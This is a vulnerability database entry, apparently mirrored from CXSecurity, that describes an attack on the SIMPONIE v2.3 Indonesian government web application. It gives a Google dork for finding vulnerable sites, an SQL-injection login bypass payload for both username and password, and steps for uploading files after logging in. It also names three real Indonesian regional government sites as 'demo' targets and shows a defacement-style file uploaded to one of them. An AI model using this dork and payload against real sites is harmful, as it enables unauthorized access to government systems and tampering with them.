SIMPONIE v2.3 Indonesia Government Responsive File Manager File Upload - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1531061 漏洞类型
发布时间 2019-03-12 更新时间 2019-03-12
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019030100
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
[+]Exploit Title: SIMPONIE v2.3 Indonesia Government Responsive File Manager File Upload
[+]Author: Negat1ve
[+]Team: -1
[+]Goolge Dork: intext:"SIMPONIE v2.3"

[+]Tested on: Windows 10 x64 
======================================= 
[+]Proof Of Concept: 

Find website with the dork
Login url will be site.go.id/panel/login

Login with this detail
user: ' or 1=1 limit 1 -- -+
password: ' or 1=1 limit 1 -- -+

You can upload your file via Responsive Drag And Drop File in "Berkas Unggahan"

Your files will go to site.go.id/fm/rc/random hash/yourfilename.jpg
example:
https://simponie2.lebakkab.go.id/fm/rc/988e396409f2ac99c9ec1ab2ce9d879743a03baa/loser.jpg

NB: 
- filetype of this uploader is jpg jpeg png

Demo sites:
https://simponie2.lebakkab.go.id/panel/login
http://simponie.serangkab.go.id/panel/login
https://simponie.tangerangselatankota.go.id/panel/login